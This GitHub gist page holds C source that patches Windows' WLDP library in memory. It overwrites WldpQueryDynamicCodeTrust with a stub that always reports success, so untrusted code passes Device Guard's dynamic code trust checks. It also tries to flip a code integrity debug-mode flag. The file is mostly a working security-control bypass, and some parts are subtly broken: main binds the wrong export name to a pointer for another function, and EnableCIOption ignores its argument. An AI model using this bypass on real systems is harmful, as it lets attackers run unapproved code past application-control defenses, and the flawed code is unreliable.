Last active
October 1, 2024 04:09
-
-
Save odzhan/9d249047cb89c716c64068c29e5be0b3 to your computer and use it in GitHub Desktop.
Patching WLDP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
BSD 3-Clause License | |
Copyright (c) 2019 Odzhan. All rights reserved. | |
Redistribution and use in source and binary forms, with or without | |
modification, are permitted provided that the following conditions are met: | |
* Redistributions of source code must retain the above copyright notice, this | |
list of conditions and the following disclaimer. | |
* Redistributions in binary form must reproduce the above copyright notice, | |
this list of conditions and the following disclaimer in the documentation | |
and/or other materials provided with the distribution. | |
* Neither the name of the copyright holder nor the names of its | |
contributors may be used to endorse or promote products derived from | |
this software without specific prior written permission. | |
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
*/ | |
#include <windows.h> | |
#include <wldp.h> | |
#include <stdio.h> | |
typedef HRESULT (WINAPI *WldpIsDynamicCodePolicyEnabled_t)( | |
PBOOL isEnabled); | |
typedef HRESULT (WINAPI *WldpQueryDynamicCodeTrust_t)( | |
HANDLE fileHandle, | |
PVOID baseImage, | |
ULONG ImageSize); | |
// fake function that always returns S_OK | |
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub( | |
HANDLE fileHandle, | |
PVOID baseImage, | |
ULONG ImageSize) | |
{ | |
return S_OK; | |
} | |
static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {} | |
static BOOL PatchWldp(VOID) { | |
BOOL patched = FALSE; | |
HMODULE wldp; | |
DWORD len, op, t; | |
LPVOID cs; | |
// load wldp | |
wldp = LoadLibrary("wldp"); | |
if(wldp != NULL) { | |
// resolve address of function to patch | |
cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust"); | |
if(cs != NULL) { | |
// calculate length of stub | |
len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd - | |
(ULONG_PTR)WldpQueryDynamicCodeTrustStub; | |
// make the memory writeable | |
if(VirtualProtect( | |
cs, len, PAGE_EXECUTE_READWRITE, &op)) | |
{ | |
// over write with stub | |
memcpy(cs, &WldpQueryDynamicCodeTrustStub, len); | |
patched = TRUE; | |
// set back to original protection | |
VirtualProtect(cs, len, op, &t); | |
} | |
} | |
} | |
return patched; | |
} | |
BOOL VerifyCodeTrust(const char *path) { | |
WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust; | |
HMODULE wldp; | |
HANDLE file, map, mem; | |
HRESULT hr = -1; | |
DWORD low, high; | |
// load wldp | |
wldp = LoadLibrary("wldp"); | |
_WldpQueryDynamicCodeTrust = | |
(WldpQueryDynamicCodeTrust_t) | |
GetProcAddress(wldp, "WldpQueryDynamicCodeTrust"); | |
// return FALSE on failure | |
if(_WldpQueryDynamicCodeTrust == NULL) { | |
printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n"); | |
return FALSE; | |
} | |
// open file reading | |
file = CreateFile( | |
path, GENERIC_READ, FILE_SHARE_READ, | |
NULL, OPEN_EXISTING, | |
FILE_ATTRIBUTE_NORMAL, NULL); | |
if(file != INVALID_HANDLE_VALUE) { | |
// get size | |
low = GetFileSize(file, &high); | |
if(low != 0) { | |
// create mapping | |
map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0); | |
if(map != NULL) { | |
// get pointer to memory | |
mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0); | |
if(mem != NULL) { | |
// verify signature | |
hr = _WldpQueryDynamicCodeTrust(0, mem, low); | |
UnmapViewOfFile(mem); | |
} | |
CloseHandle(map); | |
} | |
} | |
CloseHandle(file); | |
} | |
return hr == S_OK; | |
} | |
#include "C:\ntlib\ntddk.h" | |
#define SystemCodeIntegrityInformation 0x67 | |
#define CODEINTEGRITY_OPTION_ENABLED 0x0001 | |
#define CODEINTEGRITY_OPTION_TESTSIGN 0x0002 | |
#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x0004 | |
#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x0008 | |
#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x0010 | |
#define CODEINTEGRITY_OPTION_TEST_BUILD 0x0020 | |
#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x0040 | |
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x0080 | |
#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x0100 | |
#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x0200 | |
#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x0400 | |
#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x0800 | |
#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000 | |
#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000 | |
typedef struct _ci_opt { | |
ULONG ulOption; | |
PCHAR szOption; | |
} ci_opt; | |
ci_opt options[]={ | |
{CODEINTEGRITY_OPTION_ENABLED,"CODEINTEGRITY_OPTION_ENABLED"}, | |
{CODEINTEGRITY_OPTION_TESTSIGN,"CODEINTEGRITY_OPTION_TESTSIGN"}, | |
{CODEINTEGRITY_OPTION_UMCI_ENABLED,"CODEINTEGRITY_OPTION_UMCI_ENABLED"}, | |
{CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED"}, | |
{CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED,"CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED"}, | |
{CODEINTEGRITY_OPTION_TEST_BUILD,"CODEINTEGRITY_OPTION_TEST_BUILD"}, | |
{CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD,"CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD"}, | |
{CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED,"CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED"}, | |
{CODEINTEGRITY_OPTION_FLIGHT_BUILD,"CODEINTEGRITY_OPTION_FLIGHT_BUILD"}, | |
{CODEINTEGRITY_OPTION_FLIGHTING_ENABLED,"CODEINTEGRITY_OPTION_FLIGHTING_ENABLED"}, | |
{CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED"}, | |
{CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED"}, | |
{CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED,"CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED"}, | |
{CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED,"CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED"}, | |
{0, NULL} | |
}; | |
typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION { | |
ULONG Length; | |
ULONG CodeIntegrityOptions; | |
} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION; | |
VOID ListCIOptions(VOID) { | |
NTSTATUS status; | |
SYSTEM_CODEINTEGRITY_INFORMATION scii; | |
DWORD i, len; | |
scii.Length = sizeof(scii); | |
status = NtQuerySystemInformation( | |
SystemCodeIntegrityInformation, | |
&scii, sizeof(scii), &len); | |
if(NT_SUCCESS(status)) { | |
printf("\nCode Integrity Options.\n\n"); | |
for(i=0;options[i].ulOption != 0; i++) { | |
if(scii.CodeIntegrityOptions & options[i].ulOption) { | |
printf("%s\n", options[i].szOption); | |
} | |
} | |
} | |
} | |
// Trying to set the code integrity options will return STATUS_INVALID_INFO_CLASS | |
BOOL EnableCIOption(ULONG Option) { | |
NTSTATUS status; | |
SYSTEM_CODEINTEGRITY_INFORMATION scii; | |
DWORD i, len; | |
scii.Length = sizeof(scii); | |
status = NtQuerySystemInformation( | |
SystemCodeIntegrityInformation, | |
&scii, sizeof(scii), &len); | |
if(NT_SUCCESS(status)) { | |
scii.CodeIntegrityOptions |= CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED; | |
status = NtSetSystemInformation( | |
SystemCodeIntegrityInformation, | |
&scii, sizeof(scii), &len); | |
printf("status is %08lx\n", status); | |
} | |
return NT_SUCCESS(status); | |
} | |
int main(int argc, char *argv[]) { | |
int i; | |
WldpIsDynamicCodePolicyEnabled_t WldpIsDynamicCodePolicyEnabled; | |
BOOL enabled; | |
EnableCIOption(CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED); | |
ListCIOptions(); | |
WldpIsDynamicCodePolicyEnabled = | |
(WldpIsDynamicCodePolicyEnabled_t) | |
GetProcAddress(LoadLibrary("wldp"), "WldpQueryDynamicCodeTrust"); | |
if(WldpIsDynamicCodePolicyEnabled == NULL) { | |
printf("unable to load Wldp.\n"); | |
} | |
WldpIsDynamicCodePolicyEnabled(&enabled); | |
printf("Wldp Code Policy is %s.\n", | |
enabled ? "enabled" : "disabled"); | |
if(!PatchWldp()) { | |
printf("unable to patch Wldp.\n"); | |
return 0; | |
} | |
for(i=1; i<argc; i++) { | |
// skip directories | |
if(GetFileAttributes(argv[i]) & FILE_ATTRIBUTE_DIRECTORY) continue; | |
// verify file | |
printf("%-8s : %s\n", | |
VerifyCodeTrust(argv[i]) ? "OK" : "FAILED", | |
argv[i]); | |
} | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment